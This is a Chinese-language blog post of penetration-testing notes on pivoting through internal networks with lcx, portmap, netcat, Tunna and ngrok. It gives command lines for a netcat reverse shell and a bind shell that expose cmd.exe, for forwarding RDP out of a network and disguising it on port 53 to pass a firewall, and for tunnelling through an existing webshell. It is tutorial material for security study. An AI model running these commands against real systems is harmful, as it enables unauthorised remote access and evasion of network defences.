內網中的埠轉發

spleated發表於2018-05-18

參考文獻:http://payloads.online/archivers/2018-02-02/1
http://www.freebuf.com/articles/web/170970.html
工具下載:https://github.com/Brucetg/Pentest-tools

使用埠轉發技術來訪問內網其他主機中,或者將內網中某個埠轉發到本地。
埠對映 :
埠對映是將一臺主機的內網(LAN)IP地址對映成一個公網(WAN)IP地址,當使用者訪問提供對映埠主機的某個埠時,伺服器將請求轉移到本地區域網內部提供這種特定服務的主機。

1.lcx

 -listen <監聽埠> <轉發埠> 
 -tran<監聽埠> <目標地址> <目標埠>
 -slave <目標主機> <目標埠> <本地主機><本機埠>

埠對映 (無法訪問內網)

A(192.168.x.xx)無法訪問B( 172.21.xx.xx)主機上的埠,但B可以訪問外網

實現內網埠轉發

//在A主機上監聽兩個埠,並將來自 8989埠的請求傳送給9898埠
A主機上執行命令:lcx.exe -listen 8989 9898
//將B主機的3389埠轉發到A主機的8989埠
B主機上執行命令:lcx.exe -slave 192.168.x.xx 8989 172.21.xx.xx 3389

linux使用方式

./portmap -m 2 -p1 8989 -p2 9898
./portmap -m 3 -h1 內網主機IP -p1 3389 -h2 公網主機ip -p2 8989

A與B建立一個通道,將9898的資料不斷的傳送到B上的目標埠,中間也包括B主機目標埠響應的資料

埠轉發 (能夠訪問內網某臺主機)

①A能訪問B主機的任何埠,但是無法訪問C主機上的埠

實現埠轉發

//B主機上監聽的埠就相當於訪問了C主機上的埠
在B主機上執行:lcx.exe -tran {監聽埠} {C主機IP地址} {C主機埠}

②由於防火牆限制,部分埠無法通過防火牆
實現本地埠轉發
//將該B主機的無法通過防火牆的3389埠透傳到防火牆允許的其他埠53

B主機上執行:lcx -tran 53 B主機ip 3389

2. Termite

這個以前總結過,就不再細說了,直接看此文章就行了https://www.jianshu.com/p/cdaf50bfe6e1

3.nc反彈

①反向連線:

//在公網主機上進行監聽:
nc -lvp 9999
//在內網主機上執行:(-t 引數是指通過telnet模式執行cmd.exe)
nc.exe -t -e cmd.exe 192.168.8.140 9999

成功後得到一個內網主機的cmd shell

②正向連線

//遠端主機上執行:
nc -l -p 4444 -t -e cmd.exe
//本地主機上執行:
nc -vv 遠端主機ip 4444

成功後得到了一個遠端主機的一個cmd shell。

4.tunna

Tunna通過HTTP協議建立一個TCP通訊隧道,屬於埠複用技術。它可以用來繞過防火牆環境中的網路限制。

--help, -h 顯示此幫助資訊並退出
--url=URL, -u URL 為遠端webshel​​l的URL
--lport=LOCAL_PORT, -l LOCAL_PORT代表本地偵聽埠
--verbose, -v 詳細(輸出資料包大小)
--buffer=BUFFERSIZE, -b BUFFERSIZE* HTTP請求大小(一些網站對大小有限制)
--no-socks, -n 不使用 Socks 代理
--rport=REMOTE_PORT, -r    REMOTE_PORT遠端服務埠,供webshel​​l連線
--addr=REMOTE_IP, -a REMOTE_IP 遠端webshel​​l連線到的地址(預設為 127.0.0.1)
--ping-interval=PING_DELAY, -q PING_DELAY webshprx pinging執行緒間隔(預設值為0.5)
--start-ping, -s 首先啟動ping執行緒 - 一些服務首先傳送資料(例如,SSH)
--cookie, -C 請求cookies
--authentication, -t 基本認證

A已經擁有了B主機的Webshell,但是無法對B主機的其他埠進行通訊

//將目標伺服器的3389埠轉發到本地的1234埠
python proxy.py -u {WebShell地址} -l 1234 -r 3389 -v -n -s

//將10.10.12.1伺服器的3389埠轉發到本地的1234埠
python proxy.py -u {WebShell地址} -l 1234 -r 3389 -a 10.10.12.1 -v -n -s

5.ngrok

訪問內網上的內容

//在本機上執行
python2 -m SimpleHTTPServer 80
//在內網主機上執行
`/home/cws6/Desktop/ngrok` http 80

在本機瀏覽器中訪問Forwarding後的網址,就能訪問內網主機上的檔案。


相關文章